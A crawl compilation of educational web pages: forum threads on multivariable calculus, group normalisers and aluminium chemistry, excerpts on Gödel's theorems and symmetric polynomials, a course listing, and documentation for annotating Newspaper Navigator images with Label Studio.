Indeed, he needs to be able to see by himself the proof. In other words, there must be a $$n$$ such that $$PA\vdash Proof(\textbf n, \ulcorner A\urcorner)$$. Then he will trust that it is indeed the case that $$A$$.
I will repeat that again because it looks like a tongue twister. Suppose somebody came and assured $$PA$$ that from the axioms of $$PA$$ it follows that there exists a number $$n$$ satisfying $$Proof(\textbf n,\ulcorner A\urcorner)$$. Then $$PA$$ would say, show me the proof or I am going to assume that that $$n$$ is actually a non standard number and you a friggin’ liar.
If somebody just comes saying he has a proof, but produces none, $$PA$$ becomes suspicious. After all, the proof in question could be a non-standard proof encoded by one of the dreaded non standard numbers! Who is going to trust that!
# Gödel II
And finally we arrive to Gödel’s Second Incompleteness Theorem, perhaps the most widely misunderstood theorem of all mathematics.
We first need to introduce the notion of consistency. Simply enough, a logical system is consistent if it does not prove a contradiction, where a contradiction is something impossible. For example, it cannot ever be the case that $$P\wedge \neg P$$, so $$P\wedge \neg P$$ is a contradiction no matter what $$P$$ is. We use the symbol $$\bot$$ to represent a contradiction.
The statement of GII is as follows:
Gödel Second Incompleteness Theorem (concrete form) If $$PA$$ is consistent, then $$PA\not \vdash \neg \square_{PA}(\bot)$$
Notice that GII follows quite directly from Löb’s theorem. Actually, it is the case that Löb’s theorem also follows from GII, so both results are equivalent.
This result can be interpreted as follows: you cannot make a system as complex as $$PA$$ in which you can talk about deduction with complete certainty, and thus about consistency. In particular, such a system cannot prove that he himself is consistent.
The result is startling, but in the light of our previous exposition is clear what is going on! There is always the shadow of non standard numbers menacing our deductions.
# Summary
And that concludes our introduction to formal logic!
To recall some important things we have learned:
• Logical systems capture the intuition behind deductive reasoning. They are composed of axioms and deductive rules that are chained to compose proofs.
• Simple logical systems that are used to talk about numbers, such as $$PA$$, can be interpreted as talking about many things through encodings, and in particular they can talk about themselves.
• There are expressions in logic that capture the concepts involved in deductions. However, the most important of them, the provability predicate $$\square_{PA}$$, fails to satisfy some intuitive properties due to the inability of $$PA$$ to prove that non standard numbers do not exists.
• Löb’s theorem says that if $$PA$$ cannot prove $$A$$, then it can neither prove that from $$\square_{PA}(\ulcorner A\urcorner$$ follows $$A$$.
• $$PA$$ cannot prove its own consistency, in the sense that it cannot prove that the standard predicate is never satisfied by a contradiction.
If you want to get deeper in the rabbit hole, read about model theory and semantics or modal logic.
Parents:
• Mathematics
Mathematics is the study of numbers and other ideal objects that can be described by axioms.
• Looks like a mathjax error?
• My fault, it should be \ulcorner.
• Mention them?
|
2021-08-05 08:21:28
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8191172480583191, "perplexity": 268.0974249757678}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046155458.35/warc/CC-MAIN-20210805063730-20210805093730-00675.warc.gz"}
|
https://www.physicsforums.com/threads/integrating-differentiating-several-variables.512505/
|
# Integrating/differentiating several variables
1. Jul 7, 2011
### mexijo
Hi all! i am just a high school student and have only taken AP calculus AB, but i have a question which hopefully some of you will be able to answer. how do you take the derivative/integral of a multivariable equation? how is it decided which variable you are taking derivatives/integrals with respect to, and what is this doing conceptually?
im sorry is this is a dumb question, but all the other websites i've tried on the web use terminology and symbols im not familiar with, and are very confusing
2. Jul 7, 2011
### Saitama
Hi mexijo!!
Firstly sorry, i don't understand what you mean by "AP" and "AB".
You said that you are in a high school at present. Trying to go into Multi-Variable Calculus at this stage is dangerous (not exactly ). You should first start with the single-variable calculus and that is also fun. Why you want to go to higher level right now?
To know with what respect to we are taking the integral, we take a example:-
$$\int x^2 dx$$
Do you understand what this dx? This "dx" conveys that we are integrating with respect to x.
3. Jul 7, 2011
### BrianMath
Like the poster above said, the $dx$ tells you that you're working with respect to $x$.
@Pranav-Arora: AP Calculus AB is an Advanced Placement Calculus class, which is basically the Calculus 1 and 2 you find in colleges. Actually, a high enough score in the Advanced Placement test gives you the college credits for Calculus 1 and 2 when you enter, meaning you get to skip them and go straight to multivariable as a freshman.
Now, back to the topic at hand, let's say you have a function of several variables
$$f(x,y) = 3e^xsin\; y + x$$
When you differentiate, you hold the variable that you aren't differentiating with respect to constant.
Here's differentiating with respect to x:
$$\frac{\partial}{\partial x}f(x,y) = \frac{\partial}{\partial x}(3e^xsin\; y + x) = 3e^xsin\; y + 1$$
The squiggly d just tells you that this is a partial derivative, because you're only taking the derivative of one part (the $x$ part, in this case). Since you're only differentiating the $x$ part, just pretend that $y$ is a constant, like $\pi$ (I like to think in terms of letter constants since that makes it clear that it is a letter, but a constant one).
Now, when differentiating with respect to y:
$$\frac{\partial}{\partial y}f(x,y) = \frac{\partial}{\partial y}(3e^xsin\; y + x) = 3e^xcos\; y$$
Since the $x$ is constant when you differentiate with respect to $y$, it gets dropped out just like any other constant.
Another notation for a partial derivative is subscript notation, where the variable you're differentiating with respect to is the subscript of the function.
$$\frac{\partial}{\partial x}f(x,y) = f_x(x,y)$$
Conceptually, a derivative is how sensitive a function is to change, or, more physically speaking, the "speed" at which it changes. Another good concept is slope, you're finding the slope of a line tangent to that particular point on the curve.
For partial derivatives, remember that you're differentiating with respect to one variable, and holding all others constant. That means you're finding the slope or the rate of change in that particular direction, regardless of what the others are doing.
For integration, you have multiple integration:
2 integrals (Double Integral)
$$\int \int_R f(x,y)dA$$
3 integrals (Triple Integral)
$$\int \int \int_R f(x,y, z)dV$$
Don't get too confused over what $R$ is, it's just a placeholder for all of the limits of integration. It is the region you're integrating over.
Just like when you do a definite integral in single variable calculus, in multivariable you have to go from "a to b" on one and "c to d" on the next, etc.
Also, as for what $dA$ and $dV$, it's the product of $dx$ and $dy$ (for double) and $dz$ (all three for triple). $dA$ just stands for $dxdy$ or $dydx$ (depending on which order you integrate in), and, from an intuitive standpoint, is a differential of area (an extremely small area), that you multiply by a height ($f(x, y)$) and sum up ($\int$). In single variable calculus, you used $dx$ when integrating (or $dy$, sometimes). Remember that when you do a definite integral, you're actually summing up an infinite amount of infinitely thin rectangles to find area. In multivariable, now you're summing up cuboids to find volume (for double integrals).
So for a double integral, let's just say you have the following:
$$\int_0^3 \int_2^3 (2y+x)dxdy$$
So, just like partial derivatives, whatever you're integrating with respect to, hold everything else constant. In these integrals, you work from the inside out.
So, after the first round of integrating, you have:
$$\int_0^1 \left[2xy + \frac{x^2}{2} \right]_{x=2}^{x=3}dy =$$
Now just plug in the limits of integration, and integrate again:
$$\int_0^1 \left(2y + \frac{5}{2}\right)dy = \left[y^2 + \frac{5}{2}y \right]_0^1 = 1+\frac{5}{2}=\frac{7}{2}$$
So we have found the volume of this region, it is $\frac{7}{2}$.
You might also run into an indefinite integral, although I first saw a multivariable indefinite integral in differential equations.
Remember in an indefinite integral, you always have to add a constant. The reason is because, since this is also called the antiderivative, the added constant could have been in the function that you integrate into. Let's just say $F\,'(x) = f(x)$, if $F(x)$ has any constants, when you differentiate into $f(x)$, they're gone. So when you integrate, you have to account for any abitrary constant that may have been in $F(x)$
For multivariable, however, these arbitrary constants are now functions of the variable you held constant. So, if $f(x, y) = F_x(x,y)$, let's say for $f(x,y) = 3xy^2$, we find the integral with respect to x.
$$\int f(x,y)dx = \int 3xy^2dx = \frac{3}{2}x^2y^2 + c(y)$$
Basically, if you had any purely $y$ terms in the function $F(x,y)$, they would have been dropped out when differentiating with respect to $x$, since they're held constant. So, not only do with have to account for any constant, we have to account for any function of only $y$ when integrating with respect to $x$. The same is true for integrating a three variable expression:
$$\int f(x,y,z)dx = F(x, y, z) + c(y, z)$$
Hopefully this has helped you. If you want to go further into the subject, other than this very simple overview of only 2 topics in multivariable calculus. If you want to study further, I highly recommend going over to MIT's OpenCourseWare at http://ocw.mit.edu" [Broken].
Last edited by a moderator: May 5, 2017
4. Jul 7, 2011
### Saitama
I too use those resources and that Calculus book too. They are awesome.
Last edited by a moderator: May 5, 2017
5. Jul 8, 2011
### mexijo
thanks so much Brianmath!! i got a 5 on the ap exam btw, and im interested in what multivariable calculus is really all about and wanted to teach myself, but i couldnt find anything that seemed geared towards people who didnt already know the subject. i checked out the MIT opencourseware and it looks amazing. awesome. thanks.
|
2017-09-23 02:22:33
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9050960540771484, "perplexity": 360.09697064285115}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818689413.52/warc/CC-MAIN-20170923014525-20170923034525-00710.warc.gz"}
|
https://math.libretexts.org/Bookshelves/Abstract_Algebra/Book%3A_Introduction_to_Algebraic_Structures_(Denton)/01%3A_Symmetry/1.2%3A_Symmetric_Polynomials
|
# 1.2: Symmetric Polynomials
$$\newcommand{\vecs}[1]{\overset { \scriptstyle \rightharpoonup} {\mathbf{#1}} }$$
$$\newcommand{\vecd}[1]{\overset{-\!-\!\rightharpoonup}{\vphantom{a}\smash {#1}}}$$
So far, we've considered geometric objects. Let's also have an example of something that isn't geometric. Let $$f$$ be a polynomial in some number of variables. For now, we'll stick with 3 variables, $$x, y$$, and $$z$$. We say that $$f$$ is a symmetric polynomial if every way of switching around (ie, permuting) the variables leaves $$f$$ the same.
For example, the polynomial $$f(x,y,z)=x+y+z$$ is symmetric: switching the $$x$$ and the $$z$$, for example, gives $$z+y+x$$, which is the same as $$f$$. As a more complicated example, you can check that $$g(x,y,z)=x^2y+x^2z + y^2x + y^2z +z^2x + z^2y$$ is also symmetric.
On the other hand, $$h(x,y,z)=x^3+y^3+z$$ is not symmetric, since switching $$x$$ and $$z$$ produces $$z^3+y^3+x$$, which is not equal to $$h$$. This polynomial does have some symmetry, since switching $$x$$ and $$y$$ leaves $$h$$ the same, but we save the name 'symmetric polynomial' for the fully symmetric polynomials.
Exercise 1.2.0:
Let $$f$$ be a symmetric polynomial with $$n$$ variables. how many symmetries does $$f$$ have?
If you haven't tried a problem like this before - working in $$n$$ variables - it is extremely important to get some practice. Try writing down some different symmetric polynomials with small numbers of variables. Is there a formula that describes the the number of symmetries in terms of the number of variables?
Symmetric polynomials are really interesting things, and we'll see them again when we talk about rings and vector spaces!
### Contributors
• Tom Denton (Fields Institute/York University in Toronto)
|
2019-04-19 15:07:27
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.899309515953064, "perplexity": 238.86260725640904}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578527839.19/warc/CC-MAIN-20190419141228-20190419162955-00039.warc.gz"}
|
http://www.physics.brocku.ca/Courses/5P78/
|
Home > Courses > 5P78 PHYS 5P78 - Electronic Structure of Periodic and Aperiodic Systems Instructor: TBA Calendar entry Density Functional and related theories; survey of (semi)empirical and first-principles electronic structure methods; electronic structure of liquid metals, metallic glasses, random alloys, and quasicrystals; effective medium theories, coherent potential, and other approximations; recursion and other real-space methods.
|
2019-04-26 00:27:53
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8949564099311829, "perplexity": 11397.17003505681}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578743307.87/warc/CC-MAIN-20190425233736-20190426015736-00188.warc.gz"}
|
https://chemistry.stackexchange.com/questions/147548/what-exactly-is-hydrolysis-what-are-the-products-of-hydrolysis-of-aluminium/147570
|
# What exactly is hydrolysis? What are the products of hydrolysis of aluminium?
I came across three reactions while studying p-block compounds in inorganic chemistry.
$$\ce{2Al + 2NaOH + 6H2O -> 2 Na[Al(OH)4] + 3H2} \label{eq:1} \tag{1}$$
$$\ce{Al2O3 + 2NaOH + 3H2O -> 2 Na[Al(OH)4]} \label{eq:2} \tag{2}$$
$$\ce{Al2O3 + 6NaOH + 3H2O -> 2 Na3[Al(OH)6]} \label{eq:3} \tag{3}$$
Look at the above reactions. $$\eqref{eq:1}$$ and $$\eqref{eq:2}$$ have different reactants(aluminium and aluminium oxide) but they give the same product.
On the other hand, $$\eqref{eq:2}$$ and $$\eqref{eq:3}$$ have same reactants but give different products.
What is exactly going on in these reactions. How do I predict what product is going to be formed in the major amount?
The writers of the book haven't specified the reaction conditions.
Thanks
• What is strange about different reactants giving the same product or the same reactants giving different products ? It is quite common in chemistry. Chemistry is not mathematics. There are few laws , there are many more or less empirical rules and rest is to be remembered or found if needed. Unless experience teaches you to see unseen behaviour patterns. Mar 14 '21 at 11:45
• What is exactly the question? R1 and R2 differ in the productS. R1 involves a redox R2 & R3 don't. Also they're are unbalanced. Mar 14 '21 at 11:46
• For eventual writing and formatting of chemical or mathematical formulas or equations, see how to use MathJax Mar 14 '21 at 11:48
• Hydrolysis ... is any chemical reaction in which a molecule of water breaks one or more chemical bonds. The term is used broadly for substitution, elimination, and solvation reactions in which water is the nucleophile. Wikipedia Mar 14 '21 at 14:51
• Thank you so much Poutnik for formatting and answering to my question. Will use MathJax in future as I have learnt how to use it. Mar 15 '21 at 13:23
The difference between $$(2)$$ and $$(3)$$ is the number of $$\ce{NaOH}$$ that has been used. If few $$\ce{NaOH}$$ is available, $$\ce{Al2O3}$$ reacts according to $$(2)$$. If much $$\ce{NaOH}$$ is available, it reacts according to $$(3)$$. So equation $$(3)$$ is equal to $$(2)$$ plus twice the following equation $$(4)$$ $$\ce{Na[Al(OH)4] + 2 NaOH -> Na3[Al(OH)6]\tag{4}}$$
This is the same for the reaction of metallic aluminum. If only a few $$\ce{NaOH}$$ is available, the reaction will occur according to $$(1)$$. If enough $$\ce{NaOH}$$ is available, it will react according to $$(1) + 2·(4)$$ giving an equation $$(5)$$, which is : $$\ce{2 Al + 6 NaOH + 6 H2O -> 2 Na3[Al(OH)6] + 3 H2 \tag{5}}$$
• Both $\ce{Al}$ and $\ce{Al2O3}$ react with $\ce{NaOH}$ to produce first $\ce{Na[Al(OH)4]}$ (and of course something else, $\ce{H2}$ or $\ce{H2O}$). Now if enough $\ce{NaOH}$ is available, $\ce{Na[Al(OH)4}$ reacts with it to produce at the end $\ce{Na3[Al(OH)6]}$ Mar 15 '21 at 15:12
I will answer in a more general way to your question, because you have a specific one. Aluminium is absolutely a metal, but it can manifest peculiar features of non-metals. Its oxide, $$\text{Al}_2\text{O}_3$$ is very inert, while the hydroxide $$\text{Al}(\text{OH})_3$$ is a light-blue jelly solid with an amphoteric behavior, that is it can react both with acids and bases. I suggest you to read the "bible" Chemistry of the Elements of Greenwood and Earnshaw.
|
2022-01-21 06:37:41
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 27, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.629761278629303, "perplexity": 758.178544920121}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320302723.60/warc/CC-MAIN-20220121040956-20220121070956-00077.warc.gz"}
|
https://www.clutchprep.com/chemistry/practice-problems/107010/which-electron-transition-produces-light-of-the-highest-frequency-in-the-hydroge-1
|
# Problem: Which electron transition produces light of the highest frequency in the hydrogen atom?a) 5p → 1sb) 4p → 1sc) 3p → 1sd) 2p → 1s
###### FREE Expert Solution
We’re being asked to determine the electron transition that produces light of the highest frequency in the hydrogen atom. Recall that starting from n = 1, the distance between each energy level gets smaller as shown below:
All of the given transitions involve going from a higher energy level to a lower energy level: this means emission is involved. Recall that the energy of a photon is given by:
$\overline{){\mathbf{E}}{\mathbf{=}}{\mathbf{h\nu }}}$
We can see that energy and frequency are directly proportional: higher energy means higher frequency.
88% (136 ratings)
###### Problem Details
Which electron transition produces light of the highest frequency in the hydrogen atom?
a) 5p → 1s
b) 4p → 1s
c) 3p → 1s
d) 2p → 1s
|
2021-04-17 01:31:14
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5604323148727417, "perplexity": 2159.8734549100905}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038098638.52/warc/CC-MAIN-20210417011815-20210417041815-00207.warc.gz"}
|
https://math.stackexchange.com/questions/1556486/how-to-write-a-rigorous-proof-for-normalisers-n-gh-being-the-largest-subgr/1556913
|
# How to write a rigorous proof for normalisers $N_{G}(H)$ being the largest subgroups of $G$ such that $H \unlhd N_{G}(H)$
Prove that $N_G(H)=\{g \in G| gHg^{-1}=H\}$ is the largest subgroup of $G$ such that $H \unlhd N_G(H)$.
I have an idea of the proof that, if we assume $S \leq G$ with $H \unlhd S$ then $$\forall s \in S, \ sHs^{-1}=H$$
We know that for $S$ to be the largest subgroup of $G$ with this property, it should contain every element $g \in G$ with $gHg^{-1}=H$, hence $N_G(H)$ is the largest subgroup of $G$ with this property.
But how could I write this in rigorous mathematical language? Is this a sign that I do not have enough mathematical maturity?
• You might start by defining what you mean by "largest". If you do that properly then the proof is easy. If you do not then you have no hope of writing down a correct proof. – Derek Holt Dec 2 '15 at 13:44
• That is not what "largest" means here. It would not even make sense if the groups were infinite. – Derek Holt Dec 2 '15 at 13:47
• Try to show (1) that $N_G(H)$ is a subgroup containing $H$ and in which $H$ is normal. (2) any subgroup of $G$ containing $H$ and in which $H$ is normal, must be a subgroup of $N_G(H)$. – Nicky Hekster Dec 2 '15 at 13:48
• I do not think that you have grasped the right definition of largest - "proper", "strictly" do not apply here. – Nicky Hekster Dec 2 '15 at 13:55
• Largest means that if $K \le G$ and $H \unlhd K$, then $K \le N_G(H)$. – Derek Holt Dec 2 '15 at 13:57
To write this rigorously: Let $K < G$, $H \triangleleft K$. Let $k \in K$. Then, $k Hk^{-1} = H$. Hence, $k \in N_G(H)$ and $K < N_G(H)$.
|
2019-07-19 02:23:15
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8228998184204102, "perplexity": 148.69161569362598}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195525973.56/warc/CC-MAIN-20190719012046-20190719034046-00414.warc.gz"}
|
https://living-with-machines.github.io/nnanno/annotate.html
|
Tools to support creating and process annotation for samples of Newspaper Navigator data using Label Studio
from nbdev import *
## Annotating Newspaper Navigator data
Once you have created a sample of Newspaper Navigator data using sample, you might want to annotate it somehow. These annotations may function as the input for a machine learning model or could be used directly to explore images in the newspaper navigator data. The Examples section in the documentation shows how annotations can generate training data for machine learning tasks.
The bulk of annotation work is outsourced to label studio, which provides a flexible annotations system that supports annotations for various data types, including images and text. This module does a few steps to help process annotations produced through label studio. This module is essentially some suggestions on how you can get label-studio setup with data from Newspaper Navigator.
First, we'll create a small sample of images we want to annotate using sample. If you have already done this step, you can skip this.
sampler = nnSampler()
df = sampler.create_sample(
50, "photos", start_year=1910, end_year=1920, year_sample=False
)
There are a few ways in which we can use label studio to annotate. For example, we could download images from our sample using sample.download_sample. However, if we have a large sample of images, we might want to do some annotating before downloading all of these images locally.
Label-studio supports annotating from a URL. We can use this combined with IIIF to annotate images without downloading them all first since IIIF is a flexible interface for getting images. IIIF also gives us flexibility in annotating at a smaller resolution/size before downloading higher-res images.
## Create label studio annotation tasks
Label-studio supports a load of different ways of setting up 'tasks'. In this context, a 'task' is an image to be annotated. One way of setting up a task is to import a JSON file that includes tasks. To do this, we take an existing sample DataFrame and add column image, which contains a IIIF URL.
#### create_label_studio_json[source]
create_label_studio_json(sample:Union[DataFrame, Type[nnSampler]], fname:Union[str, Path, NoneType]=None, original:bool=True, pct:Optional[int]=None, size:Optional[tuple]=None, preserve_asp_ratio:bool=True)
create a json file which can be used to upload tasks to label studio
We can pass in either a dataframe or nnSampler to create_label_studio_json. This is a simple function that will create a JSON file that can create 'tasks' in labels studio. In this example, we pass in size parameters. This is used to generate a IIIF URL that will request this size.
create_label_studio_json(df, "tasks.json", size=(500, 500))
This creates a JSON file we can use to load tasks into label-studio.
### Importing tasks into label studio
To avoid this documentation becoming out of date, I haven't included screenshots etc. However, you can currently (January 2021) create tasks in label studio via the GUI or by passing in tasks through the CLI. For example, to load the tasks and create a template for annotating classifications
label-studio init project_name --template=image_classification --input-path=tasks.json
You can then start label-studio and complete the rest of the setup via the GUI.
label-studio start ./project_name
## Setting up labeling
For a proper introduction to configuring your labels, consult the label studio documentation. One way in which you can setup labels is to use a template as shown above. This template setups an image classification task. There are other templates for different tasks. These templates consist of XML templates that define your labels. These templates allow you to define how you want to label your images and share these definitions with others. For example
<View>
<Choices name="choice" toName="image" showInLine="true" choice="multiple">
<Choice value="human"/>
<Choice value="animal"/>
<Choice value="human-structure"/>
<Choice value="landscape"/>
</Choices>
<Image name="image" value="\$image"/>
</View>
You can change many other options in Label-studio. It also includes features such as adding a machine learning backend to support annotations.
### Notes on labelling using IIIF images
There are a few things to consider and be aware of when loading images via IIIF in label studio.
#### Missing images
Occasionally when you are doing your annotations in label studio for IIIF URLs, you will get a missing image error. This is probably because for some reason the IIIF URL has been generated incorrectly for that image, or that image doesn't exist via IIIF. If this happens, you can 'skip' this image in the annotation interface.
#### Setting a comfortable size for viewing
You can take advantage of the flexibility of IIIF by requesting images to be a specific size when you create the tasks. This also helps speed up the process of loading each image since we often request a smaller sized image to fit it in on a smallish screen comfortably.
#### Annotating vs training image size, resolution etc.
IF you are annotating labels or classifications, you may decide to annotate at a smaller size or quality and work with a higher quality image when you come to training a model. If you are doing any annotations of pixels or regions of the image, you will want to be careful to make sure these aren't lost if moving between different sizes of the image.
Label studio supports a broad range of annotation tasks which may require particular export formats i.e. COCO or VOC for object detection. Since the processing of these outputs is tasks specific this module only contains functionality to deal with image classification and labeling tasks since these were the tasks covered in the Programming Historian lessons for which this code was originally written.
### Exporting and processing CSV
Once you have finished annotating all your images or got too bored of annotating, you can export in various formats, including JSON and CSV. A CSV export is often sufficient for simple tasks and has the additional benefit of having a lower barrier to entry than JSON for people who aren't coders.
We'll now process the annotations we generated above and labeled using label studio
#### process_labels[source]
process_labels(x)
#### load_annotations_csv[source]
load_annotations_csv(csv:Union[str, Path], kind='classification')
def load_annotations_csv(csv: Union[str, Path], kind="classification"):
if kind == "classification":
df["label"] = df["choice"]
return df
if kind == "label":
df["label"] = df["choice"].apply(process_labels)
return df
As you can see above, this code doesn't do much to process the annotations into a DataFrame. The main things to note are the kind parameter. The CSV export for labelling tasks includes a column that contains a JSON with the labels. In this case, we use a pandas converter and eval and grab the choices, which returns a list of labels.
If we look at the columns from the annotation DataFrame we'll see that label studio kept the original metadata. We now have a new column label that contains our annotations. We also have a column choice containing the original column format from the label studio export, which will be different from the label column when processing labelling annotations.
annotation_df = load_annotations_csv("test_iiif_anno/label_studio_export.csv")
annotation_df.columns
Index(['batch', 'box', 'edition_seq_num', 'filepath', 'geographic_coverage',
'image', 'lccn', 'name', 'ocr', 'page_seq_num', 'page_url',
'place_of_publication', 'pub_date', 'publisher', 'score', 'url', 'id',
'choice', 'label'],
dtype='object')
We can now do the usual Pandas things to start exploring our annotations further. For example we can see how many of each label option we have
annotation_df["choice"].value_counts()
Human 52
no_human 16
Name: choice, dtype: int64
Once we have some annotations done, we'll often want to get the original images to work locally. This is particularly important if we are planning to train a machine learning model with these images. Although it is possible to train a model using the images from IIIF, since we'll usually be grabbing these images multiple times for each epoch, this isn't particularly efficient and isn't very friendly to the IIIF endpoint.
We can use the sampler.download_sample method to download our sample; we just pass in our annotation DataFrame a folder we want to download images to and an optional name to save our 'log' of the download. We can also pass in different parameters to request different size etc. of the image. See the download_sample docs for more details.
sampler.download_sample(
"test_iiif_anno/test_dl", df=annotation_df, original=True, json_name="test_dl"
)
### Moving between local annotation and the cloud ☁
Although 'storage is cheap', it isn't free. One helpful feature of the IIIF annotations workflow is that it allows you to annotate 'locally,' i.e. on a personal computer and then quickly move the information required to download all the images into the cloud without having to pass the images themselves around. This is particularly useful if you will use a service like Google Colab to train a computer vision model, i.e. you don't have the resources to rent GPUs.
In the context of working with limited bandwidth, it might also be relatively time-consuming to download a large set of images. However, it might be feasible to get around this by annotating using the IIIF images and then using a service like google Colab when you want to grab the actual images files. Since Colab is running in the cloud with a big internet tube, this should be much more doable even if your internet is limited.
Once you have download your images you may want to check if any images weren't able to download. You can do this using the check_download_df_match function.
#### check_download_df_match[source]
check_download_df_match(dl_folder:Union[Path, str], df:DataFrame)
This will let you know if you have a different number of downloaded images compared to the number of rows in the DataFrame.
check_download_df_match("test_iiif_anno/test_dl", annotation_df)
Length of DataFrame 68 and number of images in test_iiif_anno/test_dl 68 match 😀
## Working with the annotations
This will really depend on the framework or library you want to use. In fastai the process is simple since our data matches one of the fastai 'factory' methods for loading data.
from fastai.vision.all import *
df = pd.read_json("test_iiif_anno/test_dl/test_dl.json")
